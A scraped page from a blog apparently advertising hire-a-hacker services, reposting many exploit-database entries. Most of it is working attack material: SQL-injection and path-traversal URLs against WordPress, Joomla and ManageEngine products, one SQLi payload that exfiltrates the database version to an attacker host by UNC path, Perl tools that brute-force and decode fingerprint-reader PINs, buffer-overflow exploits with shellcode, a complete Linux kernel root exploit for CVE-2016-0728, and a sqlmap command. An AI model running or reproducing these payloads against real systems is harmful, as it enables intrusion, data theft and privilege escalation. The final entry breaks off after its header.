Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863221145

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/69525/info

Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability.

Attackers can exploit this issue to disclose sensitive information that may aid in further attacks.

This issue is fixed in:

Firefox 32
Firefox ESR 31.1
Thunderbird 31.1 

<style>
body {
  background-color: #d0d0d0;
}

img {
  border: 1px solid teal;
  margin: 1ex;
}

canvas {
  border: 1px solid crimson;
  margin: 1ex;
}
</style>

<body onload="set_images()">

<div id="status">
</div>

<div id="image_div">
</div>

<canvas height=32 width=32 id=cvs>
</canvas>

<h2>Variants:</h2>

<ul id="output">
</ul>

<script>
var c = document.getElementById('cvs');
var ctx = c.getContext('2d');

var loaded = 0;
var image_obj = [];
var USE_IMAGES = 300;

function check_results() {

  var uniques = [];

  uniques.push(image_obj[0].imgdata);

  document.getElementById('output').innerHTML += 
    '<img src="' + image_obj[0].imgdata + '">';

  for (var i = 1; i < USE_IMAGES; i++) {

    if (image_obj[0].imgdata != image_obj[i].imgdata) {

      for (var j = 1; j < uniques.length; j++)
        if (uniques[j] == image_obj[i].imgdata) break;

      if (j == uniques.length) {

        uniques.push(image_obj[i].imgdata);

        document.getElementById('output').innerHTML += 
          '<img src="' + image_obj[i].imgdata + '">';


      }


    }

  }

  if (uniques.length > 1)
    alert('The image has ' + uniques.length + ' variants when rendered. Looks like you have a problem.');
  else
    alert('The image has just one variant when rendered. You\'re probably OK.');

}


function count_image() {

  loaded++;

  ctx.clearRect(0, 0, 32, 32);

  try {
    ctx.drawImage(this, 0, 0, 32, 32);
  } catch (e) { }

  this.imgdata = c.toDataURL();

  if (loaded == USE_IMAGES) check_results();

}


function set_images() {

  loaded = 0;
  create_images();

  for (var i = 0; i < USE_IMAGES; i++)
    image_obj[i].src = './id:000110,src:000023.gif?' + Math.random();

}


function create_images() {

  for (var i = 0; i < USE_IMAGES; i++) {

    image_obj[i] = new Image();
    image_obj[i].height = 32;
    image_obj[i].width = 32;
    image_obj[i].onerror = count_image;
    image_obj[i].onload = count_image;

    document.getElementById('image_div').appendChild(image_obj[i]);

  }

}


</script>


<iframe src='http://www.example.com/'></iframe>
HireHackking 
source: https://www.securityfocus.com/bid/69422/info

Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
HireHackking 
source: https://www.securityfocus.com/bid/69390/info
 
Grand MA 300 is prone to multiple security weaknesses.
 
Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
 
Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This brute-forces the pin of a Grand MA 300 Fingerprint
# Access device in less than 5 minutes, if the pin
# is between 1 and 4294967296.
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use IO::Socket::INET;
use strict;
use warnings;

sub hexd {
        my ($data) = @_;
        my $ret = "";
        for (my $i=0; $i<length($data); $i++) {
                $ret .= sprintf "%X", ord(substr($data, $i, 1));
        }
        return $ret;
}
sub getword {
        my ($data, $offset) = @_;
        my $ret = 0;

        $ret = ord(substr($data, $offset, 1));
        $ret += 0x100 * ord(substr($data, $offset+1, 1));
        return $ret;
}

sub makeword {
        my ($value) = @_;

        my $ret = chr(($value & 0xFF)) . chr((($value >> 8) & 0xFF));

        return $ret;
}

sub calccrc {
        my ($packet) = @_;
        # we pad with zero for packets of uneven length
        my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
        my $crc = 0;

        # the crc is the sum of all words in the packet
        for (my $i = 0; $i<length($packet) - 2; $i += 2) {
                $crc += getword($newpacket, $i);
        }

        # if the result is to big, we add the high bits to the lower bits
        while ($crc > 0xFFFF) {
                $crc = ($crc & 0xFFFF) + ($crc >> 0x10);
        }

        # negate the checksum
        $crc = ~$crc & 0xFFFF;
        return $crc;
}

sub makepacket {
        my ($type, $cid, $seqno, $data) = @_;
        my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
        return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
}

sub calcpass {
        my ($pin, $cid) = @_;
        my $ret = 0;

        # revert the bits
        for (my $i = 0; $i < 32; $i++) {
          $ret *= 2;
          if ($pin & 1) {
            $ret = $ret + 1;
          }
          $pin = $pin / 2;
        }

        $ret += $cid;

        # xor with magic value
        $ret ^= 0x4F534B5A;

        # switch the words
        $ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

        # xor all, but third byte with last byte of gettickcount
        my $gc = 0x00;
        $ret ^= $gc + ($gc << 8) + ($gc << 24);

        # set third byte to last byte of gettickcount
        # this weakens the algorithm even further, since this byte
        # is no longer relevant to the algorithm
        $ret = ($ret & 0xFF000000) + ($gc << 16) + ($ret & 0xFFFF);
        
        return $ret;
}

# flush after every write
local $| = 1;

my ($socket,$client_socket);

# creating object interface of IO::Socket::INET modules which internally creates
# socket, binds and connects to the TCP server running on the specific port.

my $data;
$socket = new IO::Socket::INET (
        PeerHost => '192.168.1.201',    # CHANGEME
        PeerPort => '4370',
        Proto => 'udp',
) or die "ERROR in Socket Creation : $!\n";

# initialize the connection
$socket->send(makepacket(1000, 0, 0, ""));
$socket->recv($data, 1024);

my $typ = getword($data, 0);
my $cid = getword($data, 4);
if ($typ != 2005) {
        printf("Client does not need a password");
        exit(-1);
}

for (my $i = 0; $i < 65536; $i++) {
        if (($i % 10) == 0) { printf "$i\n"; }
        my $pass = calcpass($i, $cid);
        $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));

        $socket->recv($data, 1024);
        $typ = getword($data, 0);
        if ($typ == 2000) {
                printf("Found pin: %d\n", $i);
                exit(0);
        }
}

# disconnect
$socket->send(makepacket(1001, $cid, 2, ""));

$socket->close();
HireHackking 
source: https://www.securityfocus.com/bid/69390/info

Grand MA 300 is prone to multiple security weaknesses.

Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.

Grand MA 300 running firmware version 6.60 is vulnerable. 

#!/usr/bin/perl
#
# This script calculates the original pin based on the pin
# retrieved on the wire for the Grand MA 300 fingerprint access device
#
# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
# encoded pin
#
# written by Eric Sesterhenn <eric.sesterhenn () lsexperts de>
# http://www.lsexperts.de
#
use warnings;
use strict;

my $cid = 0;     # connection id
my $ret = 0x4B00A987; # pin on the wire

# get gettickcount value (third byte)
my $gc = ($ret >> 16) & 0xFF;

# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
$ret =  $ret | 0x005A0000;

# xor all, but third byte with last byte of gettickcount
$ret ^= $gc + ($gc << 8) + ($gc << 24);

# switch the words
$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);

# xor with magic value
$ret ^= 0x4F534B5A;

# substract the connection id
$ret -= $cid;

my $fin = 0;
# revert the bits
for (my $i = 0; $i < 32; $i++) {
  $fin *= 2;
  if ($ret & 1) {
    $fin = $fin + 1;
  }
  $ret = $ret / 2;
}

printf("final: %X \n", $fin);
HireHackking 
source: https://www.securityfocus.com/bid/69387/info

The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 

http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
HireHackking 
source: https://www.securityfocus.com/bid/69386/info

MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.

An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.

Versions prior to MyAwards 2.4 are vulnerable. 

https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
HireHackking 
source: https://www.securityfocus.com/bid/69307/info

ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ArticleFR 3.0.4 is vulnerable; prior versions may also be affected. 

http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
HireHackking 
source: https://www.securityfocus.com/bid/69303/info

ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The following products are affected:

ManageEngine Password Manager Pro 5 through 7 build 7003
ManageEngine IT360 8 through 10.1.1 build 10110 

www.example.com/MetadataServlet.dat?sv=[SQLi]
www.example.com/console/MetadataServlet.dat?sv=[SQLi]







>> Blind SQL injection in ManageEngine Desktop Central, Password Manager Pro and IT360 (including MSP versions)
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 19/08/2014 / Last updated: 05/02/2015

>> Background on the affected products:
"Desktop Central is an integrated desktop & mobile device management software that helps in managing the servers, laptops, desktops, smartphones and tablets from a central point. It automates your regular desktop management routines like installing patches, distributing software, managing your IT Assets, managing software licenses, monitoring software usage statistics, managing USB device usage, taking control of remote desktops, and more."

"Password Manager Pro is a secure vault for storing and managing shared sensitive information such as passwords, documents and digital identities of enterprises."

"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration."

These products have managed service providers (MSP) versions which are used to control the desktops and smartphones of several clients.
Quoting the author of the Internet Census 2012: "As a rule of thumb, if you believe that "nobody would connect that to the Internet, really nobody", there are at least 1000 people who did." 
These vulnerabilities can be abused to achieve remote code execution as SYSTEM in Windows or as the user in Linux. Needless to say, owning a Desktop Central / IT360 box will give you control of all the computers and smartphones it manages, while owning Password Manager Pro will give you a treasure trove of passwords.

>> Technical details:
The two blind SQL injections described below have been present in Desktop Central, Password Manager Pro and IT360 in all releases since 2006. They can only be triggered via a GET request, which means you can only inject around 8000 characters at a time.

#1 
Vulnerability: 
Blind SQL injection in LinkViewFetchServlet (unauthenticated on DC/PMP / authenticated on IT360)
CVE-2014-3996

Affected products / versions:
- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]

IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]


#2
Vulnerability: 
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360) 
CVE-2014-3997

Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330

Constraints: 
- PMP: no authentication or any other information needed
- IT360: valid user account needed

Proof of concept:

PMP:
GET /MetadataServlet.dat?sv=[SQLi]

IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
HireHackking 
source: https://www.securityfocus.com/bid/69278/info

WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected. 

www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
HireHackking 
# Exploit Author: Juan Sacco - http://www.exploitpack.com <
jsacco@exploitpack.com>
# Program: xwpe - Windows Editor v1.5.30a-2.1
# Description: Programming environment and editor for console and X11
# Tested and developed on:  Kali Linux 2.0 x86 - https://www.kali.org
#
# Description: xwpe v1.5.30a-2.1 and prior is prone to a stack-based buffer
# overflow vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.identicalsoftware.com/xwpe
# Kali Linux 2.0 package: pool/main/x/xwpe/xwpe_1.5.30a-2.1_i386.deb
# MD5: 793a89f7df892c7934be6c2353a6f0f9
#
#gdb$ run $(python -c 'print "\x90" * 290  + "DCBA"')
#Starting program: /usr/bin/xwe $(python -c 'print "\x90" * 290  + "DCBA"')
#sh: 1: /usr/sbin/gpm: not found
#
#  ESI: 0x41414141  EDI: 0x41414141  EBP: 0x41414141  ESP: 0xBFFFF370  EIP:
0x42434441
#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while
running hook_stop:
#Cannot access memory at address 0x42434441
#0x42434441 in ?? ()
#gdb$ backtrace
#0  0x42434441 in ?? ()
#1  0x4f4e2041 in ?? ()
#2  0x61732054 in ?? ()
#3  0x21646576 in ?? ()
#4  0x206f440a in ?? ()
#5  0x20756f79 in ?? ()
#6  0x746e6177 in ?? ()
#7  0x206f7420 in ?? ()
#8  0x65766173 in ?? ()
#9  0x6c694620 in ?? ()
#10 0x003f2065 in ?? ()
#11 0x00000088 in ?? ()
#12 0x00000132 in ?? ()
#13 0x00000006 in ?? ()
#14 0x00002710 in ?? ()
#15 0x0000009a in ?? ()
#16 0xfac9bc00 in ?? ()
#17 0x00000098 in ?? ()
#18 0x00000011 in ?? ()
#19 0xb7f783d9 in _nc_wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#20 0xb7f79162 in wgetch () from /lib/i386-linux-gnu/libncurses.so.5
#21 0x0809927d in ?? ()
#22 0x0806b23c in ?? ()
#23 0x08055c78 in ?? ()
#24 0x080565b5 in ?? ()iles  ESC-F3 Close W.  F4 Search  ^L S.Again  ESC-X
Quit

#25 0x080574aa in ?? ()
#26 0x0804b8b8 in ?? ()
#27 0xb7ddca63 in __libc_start_main (main=0x804b570, argc=0x2,
argv=0xbffff664, init=0x809a060, fini=0x809a050, rtld_fini=0xb7fedc90
<_dl_fini>, stack_end=0xbffff65c) at libc-start.c:287
#28 0x08049ea1 in ?? ()

import os,subprocess
def run():
  try:
    print "# xwpe Buffer Overflow by Juan Sacco"
    print "# It's AGAIN Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # JUNK + SHELLCODE + NOPS + EIP

    junk = "\x41"*262
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*124
    eip = "\x50\xd1\xff\xbf"
    subprocess.call(["xwpe",' ', junk + shellcode + nops + eip])

  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "Sorry, xwpe not found!"
    else:
        print "Error executing exploit"
    raise

def howtousage():
  print "Snap! Something went wrong"
  sys.exit(-1)

if __name__ == '__main__':
  try:
    print "Exploit xWPE Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
run()
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt


Vendor:
===============
www.oracle.com


Product:
========================================
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50


The HTML Converter is part of Java SE binary part of the JDK and Allows web
page authors to explicitly target
the browsers and platforms used in their environment when modifying their
pages.



Vulnerability Type:
============================
Buffer Overflow


CVE Reference:
==============
N/A



Vulnerability Details:
=====================

When calling htmlConverter.exe with specially crafted payload it will cause
buffer overflow executing arbitrary attacker supplied code.
This was a small vulnerability included as part of the overall Oracle CPU
released on January 19, 2016.

Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html



registers ...

EAX FFFFFFFE
ECX FFFFFFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 00001DB1
EDI 00000000
EIP 52525252                          <-------- "RRRR" \x52
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0



Exploit code(s):
===============

###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "
 #EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
#EIP 2469 - 2479

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)


payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)


Disclosure Timeline:
=====================================
Vendor Notification: August 28, 2015
January 20, 2016  : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
===============
Medium



Description:
=============================================================

Vulnerable Product:     [+] Java SE 6 U24 HtmlConverter.exe

=============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/69222/info

FB Gorilla plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/wp-content/plugins/fbgorilla/game_play.php?id=-7+/*!50000union*/+/*!50000select*/+1,2,%28/*!50000group_Concat%28user_login%29*/%29,4,5,6,7,8,9,0,1,2,3+from+wp_users--
HireHackking 
source: https://www.securityfocus.com/bid/69181/info

The GB Gallery Slideshow plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

GB Gallery Slideshow 1.5 is vulnerable; other versions may also be affected. 

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.67
Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3
Pragma: no-cache
Cache-control: no-cache,no-store
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 120
Connection: close

action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection]


Exploit via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://www.example.com/wp-admin/admin-ajax.php" \
--data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql 

---
Place: POST
Parameter: selected_group
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
HireHackking 
source: https://www.securityfocus.com/bid/69109/info

VoipSwitch is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks. 

https://www.example.com/user.php?action=../../../windows/win.ini%00.jpg
HireHackking 
source: https://www.securityfocus.com/bid/69105/info

The WordPress HDW Player plugin (Video Player & Video Gallery) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

HDW Player 2.4.2 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-admin/admin.php?page=videos&opt=edit&id=2 union select 1,2,user(),4,5,6,database(),8,@@version,10,11,12
HireHackking 
source: https://www.securityfocus.com/bid/69089/info

The WordPress Spreadsheet plugin (wpSS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

wpSS 0.62 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/wpSS/ss_handler.php?ss_id=-20%20UNION%20ALL%20SELECT%201,2,3,4#
HireHackking 
source: https://www.securityfocus.com/bid/69028/info

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest
HireHackking 
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/

/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */

/* EDB-Note: More information ~ http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>
#include <unistd.h>

#include <sys/ipc.h>
#include <sys/msg.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

#define STRUCT_LEN (0xb8 - 0x30)
#define COMMIT_CREDS_ADDR (0xffffffff81094250)
#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff81094550)



struct key_type {
    char * name;
    size_t datalen;
    void * vet_description;
    void * preparse;
    void * free_preparse;
    void * instantiate;
    void * update;
    void * match_preparse;
    void * match_free;
    void * revoke;
    void * destroy;
};

void userspace_revoke(void * key) {
    commit_creds(prepare_kernel_cred(0));
}

int main(int argc, const char *argv[]) {
	const char *keyring_name;
	size_t i = 0;
    unsigned long int l = 0x100000000/2;
	key_serial_t serial = -1;
	pid_t pid = -1;
    struct key_type * my_key_type = NULL;
    
struct { long mtype;
		char mtext[STRUCT_LEN];
	} msg = {0x4141414141414141, {0}};
	int msqid;

	if (argc != 2) {
		puts("usage: ./keys <key_name>");
		return 1;
	}

    printf("uid=%d, euid=%d\n", getuid(), geteuid()); 
    commit_creds = (_commit_creds) COMMIT_CREDS_ADDR;
    prepare_kernel_cred = (_prepare_kernel_cred) PREPARE_KERNEL_CREDS_ADDR;
    
    my_key_type = malloc(sizeof(*my_key_type));

    my_key_type->revoke = (void*)userspace_revoke;
    memset(msg.mtext, 'A', sizeof(msg.mtext));

    // key->uid
    *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */
    //key->perm
    *(int*)(&msg.mtext[64]) = 0x3f3f3f3f;

    //key->type
    *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;

    if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
        perror("msgget");
        exit(1);
    }

    keyring_name = argv[1];

	/* Set the new session keyring before we start */

	serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);
	if (serial < 0) {
		perror("keyctl");
		return -1;
    }
	
	if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | KEY_GRP_ALL | KEY_OTH_ALL) < 0) {
		perror("keyctl");
		return -1;
	}


	puts("Increfing...");
    for (i = 1; i < 0xfffffffd; i++) {
        if (i == (0xffffffff - l)) {
            l = l/2;
            sleep(5);
        }
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }
    sleep(5);
    /* here we are going to leak the last references to overflow */
    for (i=0; i<5; ++i) {
        if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {
            perror("keyctl");
            return -1;
        }
    }

    puts("finished increfing");
    puts("forking...");
    /* allocate msg struct in the kernel rewriting the freed keyring object */
    for (i=0; i<64; i++) {
        pid = fork();
        if (pid == -1) {
            perror("fork");
            return -1;
        }

        if (pid == 0) {
            sleep(2);
            if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {
                perror("msgget");
                exit(1);
            }
            for (i = 0; i < 64; i++) {
                if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {
                    perror("msgsnd");
                    exit(1);
                }
            }
            sleep(-1);
            exit(1);
        }
    }
   
    puts("finished forking");
    sleep(5);

    /* call userspace_revoke from kernel */
    puts("caling revoke...");
    if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {
        perror("keyctl_revoke");
    }

    printf("uid=%d, euid=%d\n", getuid(), geteuid());
    execl("/bin/sh", "/bin/sh", NULL);

    return 0;
}
HireHackking 
########################################################################################

# Title: PDF-XChange Viewer - Shading Type 7 Heap Memory Corruption 
# Application: PDF-XChange Viewer
# Version 2.5.315.0
# Platform: Windows
# Software Link: http://www.tracker-software.com/
# Date: 2015-11-15
# Author: Sébastien Morin from COSIG
# Contact: https://twitter.com/COSIG_ (@COSIG_)
# Personal contact: https://twitter.com/SebMorin1 (@SebMorin1)

########################################################################################

===================
Introduction:
===================

PDF-XChange Viewer is a proprietary PDF reader for Microsoft Windows available for free. The basic reader, which can be downloaded free of charge, includes extended/markup capabilities such as typing, highlighting, callouts, and notes. Another useful feature is its ability to display PDF files in the "preview" pane of the Windows Explorer without locking the file (and thus allowing for easy setting of metadata info). An advanced paid version is also available.
(https://en.wikipedia.org/wiki/PDF-XChange_Viewer)

########################################################################################

===================
Report Timeline:
===================

2015-11-15 Sébastien Morin from COSIG found the vulnerability;
2015-11-16 Sébastien Morin from COSIG report the vulnerability to vendor;
2015-11-16 Vendor fixed the issue;
2016-01-18 Vendor released fixed version of PDF-XChange Viewer (version 2.5.316.1)
2016-01-18 Advisory Release


########################################################################################

===================
Technical details:
===================

A heap memory corruption occurs when PDF-XChange Viewer handle a invalid Shading Type 7 stream.

An attacker can leverage this vulnerability to potentially execute arbitrary code on vulnerable installations of PDF-XChange Viewer.

########################################################################################

==========
POC:
==========

https://smsecurity.net/pdf-xchange-viewer-shading-type-7-heap-memory-corruption/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39275.zip

########################################################################################
HireHackking 
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title     	: CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by  	    	: Irving Aguilar
